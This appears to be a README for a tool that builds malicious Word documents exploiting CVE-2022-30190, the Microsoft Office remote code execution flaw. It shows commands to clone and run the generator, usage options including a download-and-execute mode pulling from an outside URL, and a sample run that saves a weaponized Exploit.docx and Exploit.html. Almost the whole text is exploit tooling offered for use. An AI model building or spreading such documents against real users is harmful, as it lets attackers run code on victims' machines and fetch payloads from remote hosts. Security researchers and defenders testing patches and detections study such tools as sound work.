This script will attempt to create a Microsoft Office document which will remotely execute code.
git clone https://github.com/joshuavanderpoll/CVE-2022-30190.git
cd CVE-2022-30190
python3 CVE-2022-30190.py --help
usage: CVE-2022-30190.py [-h] [--html HTML] [--cmd CMD] [--downexec]
[--download_url DOWNLOAD_URL]
Generate CVE-2022-30190 Word documents.
optional arguments:
-h, --help show this help message and exit
--html HTML URL to online exploit HTML file
--cmd CMD Command you want to execute on run
--downexec Enable download and execute mode
--download_url DOWNLOAD_URL
Source where to download and execute from
$ python3 CVE-2022-30190.py --doc="Original.docx" --html="http://localhost/Exploit.html" --cmd="start https://github.com/joshuavanderpoll"
[@] Starting CVE-2022-30190 Generator...
[•] Created by https://github.com/joshuavanderpoll
[•] Using Word document: Original.docx
[•] Deflating Word document...
[•] Deflated Word document.
[√] Exploited Word document saved in "./builds/Exploit.docx" (1109 bytes).
[√] Exploit HTML file saved in "./builds/Exploit.html" (4241 bytes).